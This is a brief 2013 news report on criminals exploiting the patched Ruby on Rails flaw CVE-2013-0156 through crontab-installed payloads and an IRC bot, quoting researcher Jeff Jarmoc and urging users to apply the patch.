29 May 2013
A known critical flaw in Ruby on Rails (CVE-2013-0156) is currently exploited in the wild, although it was patched months ago. The flaw, originally reported in January, is currently abused by cyber-criminals to take control of still-vulnerable servers.
According to complaints on GitHub, the attackers are injecting malicious code as scheduled tasks via Crontab, which would download and execute additional payloads on the server. One such payload downloads a source file, compiles it locally and sets up an IRC bot on the server that can be remotely controlled.
“Functionality is limited, but includes the ability to download and execute files as commanded, as well as changing servers. There’s no authentication performed, so an enterprising individual could hijack these bots fairly easily by joining the IRC server and issuing the appropriate commands,” wrote security researcher Jeff Jarmoc in an analysis on his blog.
The compromised servers are then controlled remotely from a variety of locations, including Germany, the United Kingdom and Ukraine. According to Jarmoc, the issue has also been identified on web hosting services that forgot to patch their installations.
Users who run vulnerable versions of Ruby are advised to deploy the patch immediately to avoid server compromise.